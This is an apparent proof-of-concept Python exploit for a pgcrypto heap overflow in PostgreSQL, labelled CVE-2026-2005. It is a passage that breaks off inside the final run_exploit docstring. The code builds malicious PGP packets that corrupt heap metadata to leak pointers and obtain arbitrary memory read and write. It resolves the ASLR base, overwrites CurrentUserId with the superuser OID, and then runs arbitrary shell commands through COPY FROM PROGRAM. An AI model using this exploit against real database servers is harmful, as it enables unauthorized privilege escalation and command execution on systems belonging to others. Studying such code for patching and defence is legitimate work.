5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/python

import argparse
import re
import struct
import secrets
import subprocess
import sys
import time
from typing import Tuple
import psycopg2

# pwn for binary manipulation and debugging
from pwn import *
context.arch = 'aarch64'

# Cryptographic libraries, to craft the PGP data.
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Util.number import inverse

# AES key used for session key encryption (16 bytes for AES-128)
AES_KEY = b'\x01' * 16

def generate_rsa_keypair(key_size: int = 2048) -> dict:
    """
    Generate a fresh RSA key pair and return its components as a dict.

    The returned dict holds every component needed for an OpenPGP secret key:
    - n: public modulus (p * q)
    - e: public exponent (typically 65537)
    - d: private exponent (PyCryptodome derives it modulo lcm(p-1, q-1))
    - p, q: prime factors of n
    - u: CRT coefficient, p^-1 mod q

    key_size: modulus size in *bits* (default 2048).

    The components are checked with validate_rsa_key() before being
    returned, so a ValueError is raised if they are inconsistent.
    """

    # Generate RSA key
    key = RSA.generate(key_size)

    # Extract all key components
    rsa_components = {
        'n': key.n,      # Public modulus (p * q)
        'e': key.e,      # Public exponent (typically 65537)
        'd': key.d,      # Private exponent
        'p': key.p,      # First prime factor
        'q': key.q,      # Second prime factor
        'u': inverse(key.p, key.q)  # Coefficient for CRT: p^-1 mod q
    }

    # Validate key components for correctness (raises ValueError on failure)
    validate_rsa_key(rsa_components)

    return rsa_components

def validate_rsa_key(rsa: dict) -> None:
    """
    Validate that a set of RSA key components is mathematically consistent.

    This does not test p and q for primality; it only checks that the
    components agree with each other.

    Validations performed:
    1. n = p * q (modulus is the product of the two factors)
    2. p != q, and both factors are greater than 1
    3. gcd(e, phi(n)) = 1, where phi(n) = (p-1)(q-1)
    4. (d * e) mod lambda(n) = 1, where lambda(n) = lcm(p-1, q-1)
    5. (u * p) mod q = 1 (CRT coefficient)

    rsa: mapping with integer entries 'n', 'e', 'd', 'p', 'q', 'u'.

    Returns None on success. Raises ValueError naming the first failed
    check, or KeyError if a component is missing.
    """
    import math

    n, e, d, p, q, u = rsa['n'], rsa['e'], rsa['d'], rsa['p'], rsa['q'], rsa['u']

    # Check that n = p * q
    if n != p * q:
        raise ValueError("RSA validation failed: n <> p * q")

    # Check that p and q are different
    if p == q:
        raise ValueError("RSA validation failed: p = q (not allowed)")

    # Reject degenerate factors: with p or q equal to 1, lambda(n) below is 0
    # and the modulo would raise ZeroDivisionError instead of ValueError.
    if p < 2 or q < 2:
        raise ValueError("RSA validation failed: p and q must be greater than 1")

    # Calculate phi(n) = (p-1)(q-1) and check that gcd(e, phi(n)) = 1
    phi_n = (p - 1) * (q - 1)
    if math.gcd(e, phi_n) != 1:
        raise ValueError("RSA validation failed: gcd(e, phi(n)) <> 1")

    # Check (d * e) mod lcm(p-1, q-1) = 1. PyCryptodome derives d from the
    # Carmichael function lcm(p-1, q-1). Because lambda(n) divides phi(n),
    # a d computed modulo phi(n) also passes this check.
    lambda_n = (p - 1) // math.gcd(p - 1, q - 1) * (q - 1)
    if (d * e) % lambda_n != 1:
        raise ValueError("RSA validation failed: d * e <> 1 (mod lcm(p-1, q-1))")

    # Check that (u * p) (mod q) = 1
    if (u * p) % q != 1:
        raise ValueError("RSA validation failed: u * p <> 1 (mod q)")

def mpi_encode(x: int) -> bytes:
    """
    Serialize a non-negative integer as an OpenPGP MPI (RFC 4880, Section 3.2).

    Wire layout: a 2-byte big-endian bit count followed by the minimal
    big-endian magnitude. Zero is encoded as a bit count of 0 with no
    magnitude bytes.

    Example:
        mpi_encode(65537) -> b'\\x00\\x11\\x01\\x00\\x01'   (17 bits, 0x010001)

    Raises ValueError for negative input.
    """
    if x < 0:
        raise ValueError("MPI cannot encode negative integers")

    # Zero is the one value with an empty magnitude.
    if x == 0:
        return struct.pack('>H', 0)

    bit_count = x.bit_length()
    magnitude = x.to_bytes((bit_count + 7) // 8, 'big')
    return struct.pack('>H', bit_count) + magnitude

def new_packet(tag: int, payload: bytes) -> bytes:
    """
    Wrap a payload in a new-format OpenPGP packet header (RFC 4880, 4.2).

    Header byte: bit 7 is always set, bit 6 selects the new format, and
    bits 0-5 carry the tag (the tag is masked to 6 bits). The body length
    follows:
      * 0-191:     one octet
      * 192-8383:  two octets, 192 + ((len - 192) >> 8), (len - 192) & 0xFF
      * 8384+:     0xFF followed by a 4-octet big-endian length

    Example:
        new_packet(1, b'data') -> b'\\xC1\\x04data'
    """
    size = len(payload)
    header = bytearray([0xC0 | (tag & 0x3F)])

    if size < 192:
        header.append(size)
    elif size < 8384:
        offset = size - 192
        header += bytes(((offset >> 8) + 192, offset & 0xFF))
    else:
        header.append(0xFF)
        header += struct.pack('>I', size)

    return bytes(header) + payload

def build_key_data(rsa: dict) -> bytes:
    """
    Serialize RSA key components as an OpenPGP secret-key packet (tag 7).

    Layout (RFC 4880, Section 5.5.3):
    - version 4, 4-byte creation time (now), algorithm 2 (RSA encrypt)
    - MPIs n and e (public part)
    - string-to-key usage 0 (secret material stored unencrypted)
    - MPIs d, p, q, u (secret part)
    - 2-byte checksum: sum of the secret MPI octets modulo 65536

    rsa: dict with integer entries 'n', 'e', 'd', 'p', 'q', 'u', as
    produced by generate_rsa_keypair().
    """
    public_part = b"".join([
        bytes([4]),                              # key version
        struct.pack('>I', int(time.time())),     # creation timestamp
        bytes([2]),                              # public-key algorithm
        mpi_encode(rsa['n']),
        mpi_encode(rsa['e']),
    ])

    secret_mpis = b"".join(mpi_encode(rsa[name]) for name in ('d', 'p', 'q', 'u'))
    checksum = struct.pack('>H', sum(secret_mpis) & 0xFFFF)

    # 0x00 = string-to-key usage "none": secret MPIs follow in the clear.
    return new_packet(7, public_part + b"\x00" + secret_mpis + checksum)

def pgp_cfb_encrypt_resync(key, plaintext):
    """
    Encrypt with OpenPGP's CFB variant that resynchronizes after the prefix
    (RFC 4880, Section 13.9), using AES with the first 16 bytes of `key`.

    Steps:
    1. Encrypt an all-zero register and XOR it with plaintext bytes 0-15.
    2. Encrypt that first ciphertext block and XOR only two bytes (16-17).
    3. Resync: the register becomes ciphertext bytes 2-17.
    4. Continue in ordinary full-block CFB; the final chunk may be short.

    key: AES key material (only the first 16 bytes are used).
    plaintext: bytes to encrypt; returns ciphertext of the same length.
    """
    width = 16
    ecb = AES.new(key[:16], AES.MODE_ECB)  # single-block primitive for manual CFB

    def xor(mask, data):
        return bytes(m ^ b for m, b in zip(mask, data))

    first = xor(ecb.encrypt(b'\x00' * width), plaintext[:width])
    second = xor(ecb.encrypt(first)[:2], plaintext[width:width + 2])
    pieces = [first, second]

    # Resynchronized feedback register: ciphertext bytes 2..17.
    register = first[2:] + second

    for start in range(width + 2, len(plaintext), width):
        chunk = plaintext[start:start + width]
        piece = xor(ecb.encrypt(register)[:len(chunk)], chunk)
        pieces.append(piece)
        # Full chunk replaces the register; a short final chunk keeps the tail.
        register = piece + register[len(piece):]

    return b''.join(pieces)

def build_literal_data_packet(data: bytes) -> bytes:
    """
    Wrap raw bytes in an OpenPGP literal data packet (tag 11, RFC 4880 5.9).

    The body is: format octet 'b' (binary), a zero-length filename, the
    current Unix time as a 4-byte big-endian date, then `data` verbatim.
    """
    header = b'b' + b'\x00' + struct.pack('>I', int(time.time()))
    return new_packet(11, header + data)

def build_symenc_data_packet(sess_key: bytes, cipher_algo: int, payload: bytes) -> bytes:
    """
    Build a symmetrically encrypted data packet (tag 9, RFC 4880 5.7).

    The plaintext is 16 random bytes, the last two of those repeated (the
    OpenPGP check bytes), then `payload` wrapped in a literal data packet.
    It is encrypted with pgp_cfb_encrypt_resync() under the first 16 bytes
    of `sess_key`.

    sess_key: session key material (truncated to 16 bytes).
    cipher_algo: accepted for interface compatibility but NOT used; AES
        with a 16-byte key is always applied.
    payload: raw bytes to place inside the literal data packet.
    """
    aes_key = sess_key[:16]

    random_block = secrets.token_bytes(16)
    check_prefix = random_block + random_block[-2:]   # 18 bytes

    encrypted = pgp_cfb_encrypt_resync(aes_key, check_prefix + build_literal_data_packet(payload))
    return new_packet(9, encrypted)

def build_tag1_packet(rsa: dict, sess_key: bytes) -> bytes:
    """
    Build a public-key encrypted key.

    This is a very important function, as it is able to create the packet
    triggering the overflow check.  This function can also be used to create
    "legit" packet data.

    Format (RFC 4880, Section 5.1):
    - 1 byte: version (3)
    - 8 bytes: key ID (0 = any key accepted)
    - 1 byte: public key algorithm (2 = RSA encrypt)
    - MPI: RSA-encrypted session key

    This uses in arguments the generated RSA key pair, and the session key
    to encrypt.  The latter is manipulated to trigger the overflow.

    This function returns a complete packet encrypted by a session key.
    """

    # Calculate RSA modulus size in bytes
    n_bytes = (rsa['n'].bit_length() + 7) // 8

    # Session key message format:
    # - 1 byte: symmetric cipher algorithm (7 = AES-128)
    # - N bytes: session key
    # - 2 bytes: checksum (simple sum of session key bytes)
    algo_byte = bytes([7])  # AES-128 algorithm identifier
    cksum = sum(sess_key) & 0xFFFF  # 16-bit checksum
    M = algo_byte + sess_key + struct.pack('>H', cksum)

    # PKCS#1 v1.5 padding construction
    # Format: 0x02 || PS || 0x00 || M
    # Total padded message must be exactly n_bytes long.
    total_len = n_bytes  # Total length must equal modulus size in bytes
    ps_len = total_len - len(M) - 2  # Subtract 2 for 0x02 and 0x00 bytes

    if ps_len < 8:
        raise ValueError(f"Padding string too short ({ps_len} bytes); need at least 8 bytes. "
                        f"Message length: {len(M)}, Modulus size: {n_bytes} bytes")

    # Create padding string with *ALL* bytes being 0xFF (no zero separator!)
    PS = bytes([0xFF]) * ps_len

    # Construct the complete padded message
    # Normal PKCS#1 v1.5 padding: 0x02 || PS || 0x00 || M
    padded = bytes([0x02]) + PS + bytes([0x00]) + M

    # Verify padding construction
    if len(padded) != n_bytes:
        raise ValueError(f"Padded message length ({len(padded)}) doesn't match RSA modulus size ({n_bytes})")

    # Convert padded message to integer and encrypt with RSA
    m_int = int.from_bytes(padded, 'big')

    # Ensure message is smaller than modulus (required for RSA)
    if m_int >= rsa['n']:
        raise ValueError("Padded message is larger than RSA modulus")

    # RSA encryption: c = m^e mod n
    c_int = pow(m_int, rsa['e'], rsa['n'])

    # Encode encrypted result as MPI
    c_mpi = mpi_encode(c_int)

    # Build complete packet
    ver = bytes([3])           # Version 3 packet
    key_id = b"\x00" * 8      # Key ID (0 = any key accepted)
    algo = bytes([2])         # RSA encrypt algorithm
    payload = ver + key_id + algo + c_mpi

    return new_packet(1, payload)

SRC_CHUNK_OFFSET = 100
DST_CHUNK_OFFSET = 172
SRC_CHUNK_HDR = [
 0x01,   0x01,   0x72,   0xaa,   0xbb,   0xbe,   0x00,   0x00,
 0x63,   0x00,   0x00,   0x00,   0xc0,   0x04,   0x00,   0x00
]


def build_leak_mdst_ptr_payload(rsa: dict) -> bytes:
    """
    Build a crafted PGP message to leak the mdst data pointer via
    the pfree() invalid pointer error message.

    Returns a concatenated set of PGP packets crafted for heap
    exploitation.  The mdst chunk headers are set up so that the
    mbuf struct's data pointer is exposed by a pfree() error.

    After the first run leaks the pointer, a second payload can target
    the correct address for arbitrary read.

    How it works:
    ------------
    The crafted prefix is embedded into an RSA-encrypted session key
    packet (Tag 1). During decryption, the session key bytes are parsed
    as a length prefix for mbuf chunk allocation. By crafting the session
    key bytes to match a fake chunk header (SRC_CHUNK_HDR), we overflow
    the mdst buffer's malloc chunk metadata. When PostgreSQL later tries
    to pfree() the corrupted chunk, it detects the invalid chunk header
    and throws an error message containing the invalid pointer address,
    effectively leaking the mdst->data heap pointer to us.

    The three-packet structure (Tag1, SymEnc, Tag1) ensures:
    - First Tag1: sets up the overflow payload
    - SymEnc: provides the cover encrypted data packet
    - Second Tag1: triggers the actual overflow during session key handling
    """
    # Craft the overflow payload: fill with padding, insert a fake source
    # chunk header at SRC_CHUNK_OFFSET, then place a fake destination
    # chunk header at DST_CHUNK_OFFSET with controlled values that
    # corrupt the malloc metadata for the mdst buffer.
    payload = b"\x01" * 32
    payload += b"\x02" * (SRC_CHUNK_OFFSET - len(payload))
    payload += bytes(SRC_CHUNK_HDR)
    payload += b"\x00" * (DST_CHUNK_OFFSET - len(payload))
    payload += bytes([
          0x42,   0x42,   0x42,   0x42,   0x42,   0x42,   0x42,   0x42,
          0x42,   0x42,   0x42,   0x42,
    ])

    prefix = payload + p32(len(payload))
    sedata = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=b"\x0a\x00")

    packets = [
        build_tag1_packet(rsa, prefix),
        sedata,
        build_tag1_packet(rsa, prefix),
    ]
    return b"".join(packets)


def build_sql(message_data: bytes, key_data: bytes) -> str:
    """
    Build a ``pgp_pub_decrypt_bytea`` query from raw message and key bytes.

    Each argument is hex-encoded into a PostgreSQL ``'\\x...'::bytea``
    literal. The hex text gets a newline after every full run of 72
    characters; because 72 is even, breaks always fall between hex digit
    pairs. Only output of ``bytes.hex()`` is interpolated, so the literals
    contain nothing but hex digits and newlines.
    """
    def _wrap_hex(data: bytes, width: int = 72) -> str:
        # Newline after each full `width`-sized run only; a trailing partial
        # run is left without one.
        text = data.hex()
        return "".join(
            text[i:i + width] + ("\n" if i + width <= len(text) else "")
            for i in range(0, len(text), width)
        )

    msg_hex = _wrap_hex(message_data)
    key_hex = _wrap_hex(key_data)
    return f'''SELECT pgp_pub_decrypt_bytea(
'\\x{msg_hex}'::bytea,
'\\x{key_hex}'::bytea);'''


def generate_payload(rsa: dict, mode: str, leaked_ptr: int|None = None) -> Tuple[bytes, bytes]:
    """
    Generate the PGP message and key data using the selected mode.

    In 'leak' mode: craft a payload that corrupts mdst chunk header and
    leaks the heap pointer via the pfree() error message.

    In 'exploit' mode: craft a payload that overwrites mdst->data with
    (leaked_ptr - 0x10000), causing the decryption output to contain memory
    from 0x10000 bytes before the leaked heap location. This region may
    contain PIE code pointers from earlier allocations, which we scan to
    resolve the ASLR base.
    """
    if mode == 'exploit' and leaked_ptr is not None:
        message_data = build_arb_read_payload(rsa, leaked_ptr - 0x10000)
    else:
        message_data = build_leak_mdst_ptr_payload(rsa)
    key_data = build_key_data(rsa)
    return message_data, key_data


def get_conn(conn_params: dict):
    """
    Open a psycopg2 connection in autocommit mode.

    conn_params may contain 'host', 'port', 'dbname', 'user' and 'password'.
    Missing keys fall back to '', 5432, 'postgres', '' and '' respectively;
    any other keys are ignored.
    """
    fallbacks = {
        'host': '',
        'port': 5432,
        'dbname': 'postgres',
        'user': '',
        'password': '',
    }
    connect_kwargs = {name: conn_params.get(name, default) for name, default in fallbacks.items()}

    connection = psycopg2.connect(**connect_kwargs)
    connection.autocommit = True
    return connection


def conn_params_from_args(args) -> dict:
    """
    Translate parsed CLI arguments into a connection-parameter dict.

    Reads args.host, args.port, args.dbname, args.user and args.password.
    A falsy dbname becomes 'postgres' and a falsy password becomes ''.
    """
    return dict(
        host=args.host,
        port=args.port,
        dbname=args.dbname or 'postgres',
        user=args.user,
        password=args.password or '',
    )


def execute_sql(sql: str, conn_params: dict, use_gdb: bool = False, ret_conn = False):
    """Execute SQL against PostgreSQL, return result string (data or error)."""
    conn = get_conn(conn_params)
    cur = conn.cursor()

    cur.execute("SELECT pg_backend_pid()")
    pid = cur.fetchone()[0]
    print(f"### Backend PID: {pid}", file=sys.stderr)

    if use_gdb:
        print("### Attaching GDB in tmux pane...", file=sys.stderr)
        print("### In the GDB pane: type 'continue' to resume the backend,", file=sys.stderr)
        print("### then 'continue' again through the breakpoint to trigger the overflow.",
              file=sys.stderr)
        gdb.attach(pid, gdbscript="""set architecture aarch64
set breakpoint pending on
b pgp-decrypt.c:1123
b parse_symenc_data
b pgp-pgsql.c:528
continue
""")
        time.sleep(2)

    def to_hex(v):
        if isinstance(v, memoryview):
            return v.tobytes().hex()
        return str(v)

    print("### Executing query...", file=sys.stderr)
    try:
        cur.execute(sql)
        rows = cur.fetchall()
        formatted = [[to_hex(v) for v in row] for row in rows]
        result = str(formatted)
    except Exception as e:
        result = str(e)

    if ret_conn:
        return conn
    return result


def load_symbols(binary_path: str) -> list:
    """
    Load symbol offsets from a binary ELF using readelf.

    Returns a list of (name, offset, size) tuples sorted by offset.
    """
    try:
        out = subprocess.check_output(
            ['readelf', '-sW', binary_path],
            stderr=subprocess.DEVNULL
        ).decode()
    except (subprocess.CalledProcessError, FileNotFoundError) as e:
        raise RuntimeError(f"cannot read symbols from {binary_path}: {e}")

    symbols = []
    for line in out.splitlines():
        parts = line.split()
        # readelf -sW: Num: Value Size Type Bind Vis Ndx Name
        if len(parts) < 8:
            continue
        try:
            offset = int(parts[1], 16)
            size = int(parts[2])
        except ValueError:
            continue
        typ = parts[3]
        name = parts[7]
        if typ not in ('FUNC', 'OBJECT'):
            continue
        if offset == 0:
            continue
        symbols.append((name, offset, size))

    symbols.sort(key=lambda x: x[1])
    return symbols


def resolve_pie_base(leaked_addrs: list, symbols: list, page_size: int = 0x1000) -> dict:
    """
    Stage 4: Match leaked absolute addresses against known ELF symbol
    offsets to compute PIE base candidates via a voting mechanism.

    PIE (Position Independent Executable) loads the binary at a random
    base address. Each symbol's runtime address = PIE_base + sym_offset.

    For each (leaked_addr, sym_offset) pair:
        PIE_base = leaked_addr - sym_offset

    This subtraction only yields a valid page-aligned base when both
    share the same page offset (low 12 bits). So we only consider
    (leaked_addr, sym_offset) pairs where the page offset matches.

    Each matching pair casts a "vote" for its computed base. The true
    PIE base should accumulate many votes because multiple symbols'
    addresses are stored on the heap near eath other.

    Filtering:
    - Candidates with >= 10 votes are kept (noise floor)
    - Take the 10 smallest bases (PIE is the lowest-mapped ELF segment)
    - Sort by votes descending (best candidate first)

    Returns a dict: {pie_base: vote_count} sorted by votes descending.
    """
    votes = {}
    mask = page_size - 1
    for addr in leaked_addrs:
        lo_page = addr & mask
        for _name, sym_off, _sz in symbols:
            if (sym_off & mask) != lo_page:
                continue
            if sym_off >= addr:
                continue
            base = addr - sym_off
            votes[base] = votes.get(base, 0) + 1
    # Filter to candidates with >= 10 votes, take the 10 smallest bases
    # (PIE is always the lowest-mapped ELF), then sort by votes descending.
    filtered = {k: v for k, v in votes.items() if v >= 10}
    sorted_by_addr = sorted(filtered.items(), key=lambda x: x[0])[:10]
    sorted_by_votes = sorted(sorted_by_addr, key=lambda x: x[1], reverse=True)
    return dict(sorted_by_votes)

def build_arb_write_payload(rsa: dict, mdst_addr: int, target_addr: int) -> bytes:
    """
    Stage 6: Build a crafted PGP message that overwrites memory at
    target_addr with attacker-controlled data.

    This is the most delicate part of the exploit. The overflow corrupts
    both the mdst AND the msrc MBuf chunk headers. After the overflow,
    the msrc pointer (source buffer) is corrupted, so we must carefully
    reconstruct it to point at valid PGP data.

    Key insight — we embed a symenc data packet (sedata2) at the end of
    our payload. This packet contains the data we want to write (in this
    case, p32(10) = superuser OID). We forge msrc->data and
    msrc->read_pos to point into this embedded symenc packet, so the
    decryption engine reads from it and writes the decrypted result into
    the corrupted mdst buffer (which points at target_addr).

    We use target_addr - 4 because pgp_pgsql.c:533 does:
        res_len = mbuf_steal_data(dst, &restmp);
        SET_VARSIZE(res, res_len);
    SET_VARSIZE writes the length into the first 4 bytes of the output
    buffer. So to overwrite CurrentUserId starting at its actual address,
    we need to account for the 4-byte SET_VARSIZE header.
    """

    # sedata: small symenc packet for cover (needed for initial packet parsing)
    sedata = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=b"\x0a")

    # sedata2: the write payload — when decrypted, produces p32(10)+p32(10)
    # which contains the value 10 (superuser OID) to overwrite CurrentUserId.
    # We embed this at a known offset and point msrc at it.
    sedata2 = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=p32(10)+p32(10))

    # Forged mdst MBuf: the destination buffer. data pointer set to target_addr
    # so that decrypted output is written there, overwriting CurrentUserId.
    mdst = p64(target_addr)              # data = target address
    mdst += p64(target_addr)             # data_end
    mdst += p64(target_addr)             # read_pos (unused for dst)
    mdst += p64(0xffffffffffff)          # buf_end = huge (prevent repalloc)
    mdst += b'\x00' * 2                  # no_write=0, own_data=0

    # Forged msrc MBuf: the source buffer. After the overflow corrupts the
    # real msrc, we forge a new one whose data/read_pos point at sedata2,
    # the symenc packet embedded at the end of the payload.
    # The offsets are relative to mdst_addr (the heap address we leaked):
    #   mdst struct ends at mdst_addr + len(mdst)
    #   sedata2 starts right after mdst (at mdst_addr + len(mdst))
    #   sedata2 ends at mdst_addr + len(mdst) + len(sedata2)
    msrc = p64(mdst_addr + len(mdst))                # data = start of sedata2
    msrc += p64(mdst_addr + len(mdst) + len(sedata2)) # data_end = end of sedata2
    msrc += p64(mdst_addr + len(mdst))               # read_pos = start of sedata2
    msrc += p64(0xffffffffffff)          # buf_end = huge (prevent repalloc)
    msrc += b'\x00' * 2                  # no_write=0, own_data=0
    msrc += b'\x00' * 6                  # padding

    # Build the overflow payload: padding + fake src chunk header + forged
    # msrc struct + padding + fake dst chunk header + forged mdst struct.
    payload = b'\x01' * 16
    payload += p32(0x10)
    payload += p32(0x10)
    payload += p32(0x10)
    payload += p32(0x10)
    payload += p32(0x10)
    payload += b"\x01" * (SRC_CHUNK_OFFSET - len(payload))
    payload += bytes(SRC_CHUNK_HDR)
    payload += msrc
    payload += b"\x00" * (DST_CHUNK_OFFSET - len(payload))
    payload += bytes([
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x63, 0x00, 0x00, 0x00, 0xe0, 0x05, 0x00, 0x00,
    ])

    # Append sedata2 (the write payload) right after the mdst struct.
    # The msrc pointers we forged above reference this exact data.
    mdst += sedata2
    payload += mdst

    prefix = payload + p32(len(payload))
    packets = [
        build_tag1_packet(rsa, prefix),
    ]
    return b"".join(packets)

def build_arb_read_payload(rsa: dict, target_addr: int, read_size: int = 0x10000) -> bytes:
    """
    Stage 2: Build a crafted PGP message that reads memory from target_addr.

    After leaking the mdst heap pointer, we craft a second payload that
    overwrites the mdst MBuf's data pointer to point at an arbitrary
    address. After successful decryption, pgp_pgsql.c calls
    mbuf_steal_data(dst, &restmp) which returns dst->data as the output
    bytea. By setting dst->data = target_addr, we can read arbitrary
    memory — in this case, we read from leaked_ptr - 0x10000 to dump
    heap memory and find PIE (Position Independent Executable) addresses
    that can be used to resolve the ASLR base.

    The mdst struct fields we forge:
      data     = target_addr    (where to read from)
      data_end = target_addr + read_size  (bounds check bypass)
      read_pos = target_addr    (unused for destination buffer)
      buf_end  = 0x7fffffffffff (huge value, prevents repalloc from moving the buffer)
      no_write = 0, own_data = 0
    """
    # Fake encrypted data packet for msrc buf — provides cover for the
    # decryption stream so the packet processing doesn't abort early.
    sedata = build_symenc_data_packet(AES_KEY, cipher_algo=7, payload=b"\x0a")

    # Build overflow prefix that corrupts the dst chunk header and
    # overlays a fake MBuf struct at DST_CHUNK_OFFSET.
    payload = b'\x01' * 16
    payload += p32(0x10)
    payload += b"\x01" * (SRC_CHUNK_OFFSET - len(payload))
    payload += bytes(SRC_CHUNK_HDR)
    payload += b"\x00" * (DST_CHUNK_OFFSET - len(payload))
    payload += bytes([
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x63, 0x00, 0x00, 0x00, 0xe0, 0x05, 0x00, 0x00,
    ])

    # Fake mdst MBuf pointing at the target address
    mdst = p64(target_addr)              # data = target address
    mdst += p64(target_addr + read_size) # data_end
    mdst += p64(target_addr)             # read_pos (unused for dst)
    mdst += p64(0x7fffffffffff)          # buf_end = huge (prevent repalloc)
    mdst += b'\x00' * 2                  # no_write=0, own_data=0
    mdst += b'\x00' * 6                  # padding

    payload += mdst
    prefix = payload + p32(len(payload))
    packets = [
        build_tag1_packet(rsa, b'\x01' * 16),
        sedata,
        build_tag1_packet(rsa, prefix),
    ]
    return b"".join(packets)


# ---------------------------------------------------------------------------
# Exploit stages — each function handles one discrete step of the exploit.
# ---------------------------------------------------------------------------

def leak_mdst_pointer(rsa: dict, conn_params: dict) -> int | None:
    """
    Stage 1: Leak the mdst->data heap pointer via the pfree error message.

    The overflow payload corrupts the malloc chunk header of the mdst buffer.
    When PostgreSQL attempts to pfree() the mdst buffer at the end of
    decryption, the allocator detects the corrupted chunk metadata and
    raises an error: "pfree called with invalid pointer 0x...". We parse
    this error message to extract the heap address of mdst->data.
    """
    print("\n### === STAGE 1: leaking mdst pointer ===\n", file=sys.stderr)
    msg, key = generate_payload(rsa, 'leak')
    sql = build_sql(msg, key)
    result = execute_sql(sql, conn_params, use_gdb=False)

    match = re.search(r'pfree called with invalid pointer (0x[0-9a-fA-F]+)', result)
    if not match:
        print(f"ERROR: could not parse leaked pointer from: {result}", file=sys.stderr)
        return None

    leaked_ptr = int(match.group(1), 16)
    print(f"### Leaked mdst ptr: 0x{leaked_ptr:x}", file=sys.stderr)
    return leaked_ptr


def scan_for_pointers(result: str, leaked_ptr: int) -> list[int]:
    """
    Stage 3: Scan leaked hex dump for non-heap pointer candidates.

    The arbitrary read from stage 2 returns a hex dump of memory around
    leaked_ptr - 0x10000. We scan this dump for 8-byte little-endian
    values that look like code/data pointers (>= 0x500000000000) but
    are NOT heap addresses (they don't share the heap region prefix).
    These are potential PIE addresses that were stored on the heap and
    can be used to resolve the postgres binary's ASLR base.

    Because addresses may not be 8-byte aligned on the heap, we try
    8 different alignments (0-7 byte offsets) when scanning.
    """
    ADDR_LEN = 16
    BYTE_STEP = 2
    heap_region = leaked_ptr >> 28
    print(f"### Heap region prefix: 0x{heap_region:010x}", file=sys.stderr)

    hexdata = ''.join(c for c in result if c in '0123456789abcdef')
    print(f"### Scanning {len(hexdata)} hex chars for pointers:", file=sys.stderr)

    leaked_addrs = []
    for align in range(8):
        start = align * BYTE_STEP
        for i in range(start, len(hexdata) - ADDR_LEN + 1, ADDR_LEN):
            hex_slice = hexdata[i:i + ADDR_LEN]
            try:
                le_bytes = bytes.fromhex(hex_slice)
            except ValueError:
                continue
            addr = int.from_bytes(le_bytes, 'little')
            if addr < 0x500000000000:
                continue
            if (addr >> 28) == heap_region:
                continue
            if addr not in leaked_addrs:
                leaked_addrs.append(addr)

    print(f"### Collected {len(leaked_addrs)} unique non-heap candidates", file=sys.stderr)
    return leaked_addrs


def find_symbol_offset(symbols: list, name: str) -> int | None:
    """Find the offset of a named symbol in the symbol list."""
    for sym_name, off, _sz in symbols:
        if sym_name == name:
            return off
    return None


def query_expected_oid(conn_params: dict) -> int:
    """
    Return the OID of the role this session runs as.

    Opens a fresh connection with get_conn(conn_params) and runs
    ``SELECT current_user::regrole::oid;``. Returns the first column of the
    first row.

    The connection is closed even when the query or fetch raises. Previously
    an exception leaked the connection.
    """
    conn = get_conn(conn_params)
    try:
        cur = conn.cursor()
        cur.execute("SELECT current_user::regrole::oid;")
        return cur.fetchone()[0]
    finally:
        conn.close()


def test_pie_candidate(rsa: dict, conn_params: dict, base: int,
                       current_user_offset: int, expected_oid: int) -> int | None:
    """
    Stage 5: Check whether ``base`` is the real PIE base.

    Steps:
    1. Read 0x10 bytes at ``base + current_user_offset`` through the
       arbitrary-read payload.
    2. Keep only the lowercase hex digits of the query result.
    3. Decode the first 8 digits (4 bytes) as a little-endian integer.
    4. Compare that value with ``expected_oid``, the session's own role OID.

    Returns ``base`` on a match. Returns None on a mismatch, or when fewer
    than 8 hex digits came back.
    """
    target = base + current_user_offset
    print(f"### Testing PIE 0x{base:016x} (CurrentUserId @ 0x{target:016x})...", file=sys.stderr)
    payload = build_arb_read_payload(rsa, target, read_size=0x10)
    sql = build_sql(payload, build_key_data(rsa))
    output = execute_sql(sql, conn_params, use_gdb=False)

    digits = ''.join(filter('0123456789abcdef'.__contains__, output))
    if len(digits) < 8:
        print("###   -> no data returned", file=sys.stderr)
        return None

    value = int.from_bytes(bytes.fromhex(digits[:8]), 'little')
    is_match = value == expected_oid
    print(f"###   -> value: {value} (0x{value:x}) {'MATCH' if is_match else ''}", file=sys.stderr)
    return base if is_match else None


def execute_privileged_command(conn, cmd: str) -> str:
    """
    Stage 7: Run ``cmd`` through COPY ... FROM PROGRAM and return its output.

    Sends one multi-statement query on ``conn`` that:
    - creates a temporary table ``cmd_out``;
    - COPYs the program's output into it;
    - selects it back.

    The first column of every returned row is joined with newlines.

    NOTE(review): ``cmd`` is interpolated verbatim inside single quotes, so
    a command containing a single quote will break the statement. Because
    the table is created without IF NOT EXISTS, a second call on the same
    session would likely fail on the existing ``cmd_out``.
    """
    query = f"""
CREATE TEMP TABLE cmd_out (line text);
  COPY cmd_out FROM PROGRAM '{cmd}';
  SELECT * FROM cmd_out;
    """
    cursor = conn.cursor()
    cursor.execute(query)
    lines = (row[0] for row in cursor.fetchall())
    return '\n'.join(lines)


def run_exploit(rsa: dict, conn_params: dict, binary_path: str, cmd: str, use_gdb: bool = False) -> None:
    """
    Autonomous multi-stage exploit against CVE-2026-2005 (pgcrypto heap overflow).

    Exploit flow (7 stages):
    1. Heap pointer leak — corrupt mdst chunk header, parse pfree() error
    2. Arbitrary read — overwrite mdst->data to (leaked_ptr - 0x10000),
       dumping heap memory that may contain PIE code pointers.
    3. Scan dump for non-heap addresses (candidate PIE pointers).
    4. Vote on PIE base: match candidate addresses against ELF symbol
       offsets from the postgres binary.
    5. Validate best candidate by reading CurrentUserId and comparing
       against our session's known OID.
    6. Arbitrary write: forge both msrc and mdst MBufs. msrc points at
       an embedded symenc packet containing encrypted superuser OID (10);
       mdst points at CurrentUserId - 4 (to account for SET_VARSIZE).
    7. Privilege escalation: with CurrentUserId=10, execute COPY FROM
       PROGRAM to run arbitrary shell commands as the postgres OS user.

    Args:
        rsa: RSA key components as returned by generate_rsa_keypair()
            (keys 'n', 'e', 'd', 'p', 'q', 'u').
        conn_params: connection parameters, built by conn_params_from_args()
            in main(). Forwarded to every database helper used here.
        binary_path: path to the postgres binary. Its symbols are loaded
            with load_symbols() to resolve the PIE base.
        cmd: shell command to run via COPY FROM PROGRAM once CurrentUserId
